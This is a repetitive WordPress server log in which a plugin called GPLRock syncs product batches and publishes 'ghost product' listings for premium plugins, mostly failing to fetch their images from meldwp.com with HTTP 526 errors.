UTC] GPLRock: Image download failed for product woocommerce-product-subtitle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:30 UTC] GPLRock: Image download failed for product woocommerce-product-subtitle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-subtitle-2234.webp for product woocommerce-product-subtitle after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:32 UTC] GPLRock: Image download failed for product woocommerce-product-subtitle (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:34 UTC] GPLRock: Image download failed for product woocommerce-product-subtitle (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-subtitle-2234.webp for product woocommerce-product-subtitle after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:37 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-subtitle. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-subtitle-2234.webp [08-Mar-2026 18:00:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-subtitle [08-Mar-2026 18:00:38 UTC] GPLRock: Image downloaded successfully for product ptclab-pay-per-click-platform (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf16d592.webp [08-Mar-2026 18:00:38 UTC] GPLRock: Using pre-downloaded image for product ptclab-pay-per-click-platform: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf16d592.webp [08-Mar-2026 18:00:38 UTC] GPLRock: Ghost product published with image - Product ID: ptclab-pay-per-click-platform [08-Mar-2026 18:00:38 UTC] GPLRock: Image download failed for product fluxstore-delivery-boy-flutter-app-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:40 UTC] GPLRock: Image download failed for product fluxstore-delivery-boy-flutter-app-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fluxstore-delivery-boy---flutter-app-for-woocommerce-10559.webp for product fluxstore-delivery-boy-flutter-app-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:42 UTC] GPLRock: Image download failed for product fluxstore-delivery-boy-flutter-app-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:44 UTC] GPLRock: Image download failed for product fluxstore-delivery-boy-flutter-app-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fluxstore-delivery-boy---flutter-app-for-woocommerce-10559.webp for product fluxstore-delivery-boy-flutter-app-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:46 UTC] GPLRock WARNING: Image download failed for product fluxstore-delivery-boy-flutter-app-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/fluxstore-delivery-boy---flutter-app-for-woocommerce-10559.webp [08-Mar-2026 18:00:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fluxstore-delivery-boy-flutter-app-for-woocommerce [08-Mar-2026 18:00:46 UTC] GPLRock: Image download failed for product tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:48 UTC] GPLRock: Image download failed for product tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs-3388.webp for product tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:51 UTC] GPLRock: Image download failed for product tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:53 UTC] GPLRock: Image download failed for product tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 18:00:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs-3388.webp for product tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 18:00:55 UTC] GPLRock WARNING: Image download failed for product tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs. URL: https://meldwp.com/wp-content/uploads/tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs-3388.webp [08-Mar-2026 18:00:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tour-guide-builder-for-wordpress-zero-code-onboarding-and-walkthroughs [08-Mar-2026 18:00:55 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1200, Total: 100/9737 [08-Mar-2026 18:00:56 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 18:00:57 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 18:00:58 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1300, Total: 100/9737 [08-Mar-2026 18:00:59 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 18:00:59 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 19:00:54 UTC] GPLRock: Image download failed for product woocommerce-tiered-pricing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:00:57 UTC] GPLRock: Image download failed for product woocommerce-tiered-pricing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:00:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-tiered-pricing-29458.webp for product woocommerce-tiered-pricing after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:00:59 UTC] GPLRock: Image download failed for product woocommerce-tiered-pricing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:01 UTC] GPLRock: Image download failed for product woocommerce-tiered-pricing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-tiered-pricing-29458.webp for product woocommerce-tiered-pricing after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:03 UTC] GPLRock WARNING: Image download failed for product woocommerce-tiered-pricing. URL: https://meldwp.com/wp-content/uploads/woocommerce-tiered-pricing-29458.webp [08-Mar-2026 19:01:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-tiered-pricing [08-Mar-2026 19:01:03 UTC] GPLRock: Image download failed for product profile-card-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:05 UTC] GPLRock: Image download failed for product profile-card-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/profile-card-for-wpbakery-page-builder-formerly-visual-composer-4286.webp for product profile-card-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:08 UTC] GPLRock: Image download failed for product profile-card-for-wpbakery-page-builder-formerly-visual-composer (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:10 UTC] GPLRock: Image download failed for product profile-card-for-wpbakery-page-builder-formerly-visual-composer (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/profile-card-for-wpbakery-page-builder-formerly-visual-composer-4286.webp for product profile-card-for-wpbakery-page-builder-formerly-visual-composer after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:12 UTC] GPLRock WARNING: Image download failed for product profile-card-for-wpbakery-page-builder-formerly-visual-composer. URL: https://meldwp.com/wp-content/uploads/profile-card-for-wpbakery-page-builder-formerly-visual-composer-4286.webp [08-Mar-2026 19:01:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: profile-card-for-wpbakery-page-builder-formerly-visual-composer [08-Mar-2026 19:01:14 UTC] GPLRock: Image download failed for product arnica-creative-coming-soon-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:16 UTC] GPLRock: Image download failed for product arnica-creative-coming-soon-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arnica---creative-coming-soon-wordpress-plugin-4478.webp for product arnica-creative-coming-soon-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:18 UTC] GPLRock: Image download failed for product arnica-creative-coming-soon-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:20 UTC] GPLRock: Image download failed for product arnica-creative-coming-soon-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/arnica---creative-coming-soon-wordpress-plugin-4478.webp for product arnica-creative-coming-soon-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:22 UTC] GPLRock WARNING: Image download failed for product arnica-creative-coming-soon-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/arnica---creative-coming-soon-wordpress-plugin-4478.webp [08-Mar-2026 19:01:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: arnica-creative-coming-soon-wordpress-plugin [08-Mar-2026 19:01:24 UTC] GPLRock: Image download failed for product wprotect-wordpress-automatically-append-copyright-notice-on-copied-content (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:26 UTC] GPLRock: Image download failed for product wprotect-wordpress-automatically-append-copyright-notice-on-copied-content (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wprotect---wordpress-automatically-append-copyright-notice-on-copied-content-17642.webp for product wprotect-wordpress-automatically-append-copyright-notice-on-copied-content after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:28 UTC] GPLRock: Image download failed for product wprotect-wordpress-automatically-append-copyright-notice-on-copied-content (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:30 UTC] GPLRock: Image download failed for product wprotect-wordpress-automatically-append-copyright-notice-on-copied-content (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wprotect---wordpress-automatically-append-copyright-notice-on-copied-content-17642.webp for product wprotect-wordpress-automatically-append-copyright-notice-on-copied-content after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:32 UTC] GPLRock WARNING: Image download failed for product wprotect-wordpress-automatically-append-copyright-notice-on-copied-content. URL: https://meldwp.com/wp-content/uploads/wprotect---wordpress-automatically-append-copyright-notice-on-copied-content-17642.webp [08-Mar-2026 19:01:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wprotect-wordpress-automatically-append-copyright-notice-on-copied-content [08-Mar-2026 19:01:32 UTC] GPLRock: Image download failed for product colio-jquery-portfolio-content-expander-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:35 UTC] GPLRock: Image download failed for product colio-jquery-portfolio-content-expander-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/colio---jquery-portfolio-content-expander-plugin-5066.webp for product colio-jquery-portfolio-content-expander-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:37 UTC] GPLRock: Image download failed for product colio-jquery-portfolio-content-expander-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:39 UTC] GPLRock: Image download failed for product colio-jquery-portfolio-content-expander-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/colio---jquery-portfolio-content-expander-plugin-5066.webp for product colio-jquery-portfolio-content-expander-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:41 UTC] GPLRock WARNING: Image download failed for product colio-jquery-portfolio-content-expander-plugin. URL: https://meldwp.com/wp-content/uploads/colio---jquery-portfolio-content-expander-plugin-5066.webp [08-Mar-2026 19:01:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: colio-jquery-portfolio-content-expander-plugin [08-Mar-2026 19:01:41 UTC] GPLRock: Image download failed for product bookmify-appointment-booking-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:43 UTC] GPLRock: Image download failed for product bookmify-appointment-booking-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookmify---appointment-booking-wordpress-plugin-16618.webp for product bookmify-appointment-booking-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:46 UTC] GPLRock: Image download failed for product bookmify-appointment-booking-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:48 UTC] GPLRock: Image download failed for product bookmify-appointment-booking-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bookmify---appointment-booking-wordpress-plugin-16618.webp for product bookmify-appointment-booking-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:50 UTC] GPLRock WARNING: Image download failed for product bookmify-appointment-booking-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/bookmify---appointment-booking-wordpress-plugin-16618.webp [08-Mar-2026 19:01:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bookmify-appointment-booking-wordpress-plugin [08-Mar-2026 19:01:50 UTC] GPLRock: Image download failed for product simple-invoice-manager-invoicing-made-easy (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:52 UTC] GPLRock: Image download failed for product simple-invoice-manager-invoicing-made-easy (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-invoice-manager---invoicing-made-easy-12891.webp for product simple-invoice-manager-invoicing-made-easy after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:54 UTC] GPLRock: Image download failed for product simple-invoice-manager-invoicing-made-easy (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:56 UTC] GPLRock: Image download failed for product simple-invoice-manager-invoicing-made-easy (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:01:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/simple-invoice-manager---invoicing-made-easy-12891.webp for product simple-invoice-manager-invoicing-made-easy after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:01:58 UTC] GPLRock WARNING: Image download failed for product simple-invoice-manager-invoicing-made-easy. URL: https://meldwp.com/wp-content/uploads/simple-invoice-manager---invoicing-made-easy-12891.webp [08-Mar-2026 19:01:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: simple-invoice-manager-invoicing-made-easy [08-Mar-2026 19:01:59 UTC] GPLRock: Image download failed for product woocommerce-discounts-and-dynamic-pricing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:01 UTC] GPLRock: Image download failed for product woocommerce-discounts-and-dynamic-pricing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-discounts-and-dynamic-pricing-16032.webp for product woocommerce-discounts-and-dynamic-pricing after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:02:03 UTC] GPLRock: Image download failed for product woocommerce-discounts-and-dynamic-pricing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:05 UTC] GPLRock: Image download failed for product woocommerce-discounts-and-dynamic-pricing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-discounts-and-dynamic-pricing-16032.webp for product woocommerce-discounts-and-dynamic-pricing after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:02:07 UTC] GPLRock WARNING: Image download failed for product woocommerce-discounts-and-dynamic-pricing. URL: https://meldwp.com/wp-content/uploads/woocommerce-discounts-and-dynamic-pricing-16032.webp [08-Mar-2026 19:02:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-discounts-and-dynamic-pricing [08-Mar-2026 19:02:07 UTC] GPLRock: Image download failed for product cool-timeline-pro-horizontal-vertical-timeline-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:09 UTC] GPLRock: Image download failed for product cool-timeline-pro-horizontal-vertical-timeline-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cool-timeline-pro---horizontal--vertical-timeline-plugin-for-wordpress-13097.webp for product cool-timeline-pro-horizontal-vertical-timeline-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:02:12 UTC] GPLRock: Image download failed for product cool-timeline-pro-horizontal-vertical-timeline-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:14 UTC] GPLRock: Image download failed for product cool-timeline-pro-horizontal-vertical-timeline-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cool-timeline-pro---horizontal--vertical-timeline-plugin-for-wordpress-13097.webp for product cool-timeline-pro-horizontal-vertical-timeline-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:02:16 UTC] GPLRock WARNING: Image download failed for product cool-timeline-pro-horizontal-vertical-timeline-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/cool-timeline-pro---horizontal--vertical-timeline-plugin-for-wordpress-13097.webp [08-Mar-2026 19:02:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cool-timeline-pro-horizontal-vertical-timeline-plugin-for-wordpress [08-Mar-2026 19:02:16 UTC] GPLRock: Image download failed for product popup-banner-wordpress-plugin-float-banners (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:18 UTC] GPLRock: Image download failed for product popup-banner-wordpress-plugin-float-banners (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-banner-wordpress-plugin---float-banners-16190.webp for product popup-banner-wordpress-plugin-float-banners after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:02:20 UTC] GPLRock: Image download failed for product popup-banner-wordpress-plugin-float-banners (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:22 UTC] GPLRock: Image download failed for product popup-banner-wordpress-plugin-float-banners (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 19:02:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-banner-wordpress-plugin---float-banners-16190.webp for product popup-banner-wordpress-plugin-float-banners after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 19:02:24 UTC] GPLRock WARNING: Image download failed for product popup-banner-wordpress-plugin-float-banners. URL: https://meldwp.com/wp-content/uploads/popup-banner-wordpress-plugin---float-banners-16190.webp [08-Mar-2026 19:02:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: popup-banner-wordpress-plugin-float-banners [08-Mar-2026 19:02:25 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1400, Total: 100/9737 [08-Mar-2026 19:02:26 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 19:02:27 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 19:02:28 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1500, Total: 100/9737 [08-Mar-2026 19:02:29 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 19:02:30 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 19:02:30 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 19:02:30 UTC] GPLRock API Sync: Batch başlıyor - Offset: 1600, Total: 100/9737 [08-Mar-2026 19:02:31 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 19:02:31 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 22:22:19 UTC] GPLRock: Image downloaded successfully for product ultimate-woocommerce-tip-or-donation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-899774ba.webp [08-Mar-2026 22:22:19 UTC] GPLRock: Using pre-downloaded image for product ultimate-woocommerce-tip-or-donation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-899774ba.webp [08-Mar-2026 22:22:19 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-woocommerce-tip-or-donation [08-Mar-2026 22:22:19 UTC] GPLRock: Image download failed for product eventozilla-event-calendar-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:21 UTC] GPLRock: Image download failed for product eventozilla-event-calendar-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventozilla---event-calendar-wordpress-plugin-24381.webp for product eventozilla-event-calendar-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:22:24 UTC] GPLRock: Image download failed for product eventozilla-event-calendar-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:26 UTC] GPLRock: Image download failed for product eventozilla-event-calendar-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventozilla---event-calendar-wordpress-plugin-24381.webp for product eventozilla-event-calendar-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:22:28 UTC] GPLRock WARNING: Image download failed for product eventozilla-event-calendar-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/eventozilla---event-calendar-wordpress-plugin-24381.webp [08-Mar-2026 22:22:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eventozilla-event-calendar-wordpress-plugin [08-Mar-2026 22:22:28 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-classy-flipbook (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:30 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-classy-flipbook (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---classy-flipbook-1002.webp for product wpbakery-page-builder-add-on-classy-flipbook after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:22:32 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-classy-flipbook (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:34 UTC] GPLRock: Image download failed for product wpbakery-page-builder-add-on-classy-flipbook (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---classy-flipbook-1002.webp for product wpbakery-page-builder-add-on-classy-flipbook after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:22:36 UTC] GPLRock WARNING: Image download failed for product wpbakery-page-builder-add-on-classy-flipbook. URL: https://meldwp.com/wp-content/uploads/wpbakery-page-builder-add-on---classy-flipbook-1002.webp [08-Mar-2026 22:22:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wpbakery-page-builder-add-on-classy-flipbook [08-Mar-2026 22:22:37 UTC] GPLRock: Image downloaded successfully for product product-bundles-elementor-woocommerce-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68ac7eb5.webp [08-Mar-2026 22:22:37 UTC] GPLRock: Using pre-downloaded image for product product-bundles-elementor-woocommerce-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-68ac7eb5.webp [08-Mar-2026 22:22:37 UTC] GPLRock: Ghost product published with image - Product ID: product-bundles-elementor-woocommerce-wordpress-plugin [08-Mar-2026 22:22:37 UTC] GPLRock: Image download failed for product woocommerce-adyen-payment-gateway-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:39 UTC] GPLRock: Image download failed for product woocommerce-adyen-payment-gateway-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-adyen-payment-gateway-plugin-5240.webp for product woocommerce-adyen-payment-gateway-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:22:41 UTC] GPLRock: Image download failed for product woocommerce-adyen-payment-gateway-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:43 UTC] GPLRock: Image download failed for product woocommerce-adyen-payment-gateway-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-adyen-payment-gateway-plugin-5240.webp for product woocommerce-adyen-payment-gateway-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:22:45 UTC] GPLRock WARNING: Image download failed for product woocommerce-adyen-payment-gateway-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-adyen-payment-gateway-plugin-5240.webp [08-Mar-2026 22:22:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-adyen-payment-gateway-plugin [08-Mar-2026 22:22:46 UTC] GPLRock: Image downloaded successfully for product wp-brain-wordpress-logic-controller (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b4efbd23.webp [08-Mar-2026 22:22:46 UTC] GPLRock: Using pre-downloaded image for product wp-brain-wordpress-logic-controller: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b4efbd23.webp [08-Mar-2026 22:22:46 UTC] GPLRock: Ghost product published with image - Product ID: wp-brain-wordpress-logic-controller [08-Mar-2026 22:22:47 UTC] GPLRock: Image download failed for product comment-system-plugin-for-wordpress-ajax-comments-comment-press (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:49 UTC] GPLRock: Image download failed for product comment-system-plugin-for-wordpress-ajax-comments-comment-press (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/comment-system-plugin-for-wordpress--ajax-comments---comment-press-23603.webp for product comment-system-plugin-for-wordpress-ajax-comments-comment-press after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:22:51 UTC] GPLRock: Image download failed for product comment-system-plugin-for-wordpress-ajax-comments-comment-press (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:53 UTC] GPLRock: Image download failed for product comment-system-plugin-for-wordpress-ajax-comments-comment-press (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 22:22:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/comment-system-plugin-for-wordpress--ajax-comments---comment-press-23603.webp for product comment-system-plugin-for-wordpress-ajax-comments-comment-press after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 22:22:55 UTC] GPLRock WARNING: Image download failed for product comment-system-plugin-for-wordpress-ajax-comments-comment-press. URL: 